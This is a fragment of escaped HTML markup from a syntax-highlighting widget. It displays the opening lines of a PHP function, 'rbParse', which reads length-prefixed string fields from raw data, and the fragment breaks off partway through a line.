-webkit-tap-highlight-color: transparent; padding: 0px !important; vertical-align: top !important; font-family: Monaco, MonacoRegular, &amp;quot;Courier New&amp;quot;, monospace !important; border: 0px; margin: 0px !important; background: 0px center; width: 722.4px;&quot;&gt;&lt;div class=&quot;crayon-pre&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; padding-right: 0px; padding-left: 0px; margin: 0px; white-space: pre; overflow: visible; tab-size: 4; background: none !important; border: none !important; padding-top: 5px !important; padding-bottom: 3px !important; font-size: 12px !important; line-height: 15px !important;&quot;&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1aa4811772815-1&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-t&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important; color: rgb(128, 0, 128) !important;&quot;&gt;function&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;rbParse&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$rawData&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;{&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1aa4811772815-2&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;	&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$parsed&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-t&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important; color: rgb(128, 0, 128) !important;&quot;&gt;array&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1aa4811772815-3&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;	&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$idx&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1aa4811772815-4&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;	&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$pointer&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1aa4811772815-5&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&amp;nbsp;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1aa4811772815-6&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;	&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;while&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;strlen&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$rawData&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$pointer&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;{&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1aa4811772815-7&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$rawData&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$pointer&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;==&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;STR&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;{&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1aa4811772815-8&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;			&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$pointer&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;++&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1aa4811772815-9&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;			&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$length&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;ord&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$rawData&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$pointer&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1aa4811772815-10&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;			&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$pointer&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;++&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1aa4811772815-11&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;			&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$parsed&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$idx&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;substr&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$rawData&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$pointer&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$length&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1aa4811772815-12&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;			&lt;/span&gt;&lt;span 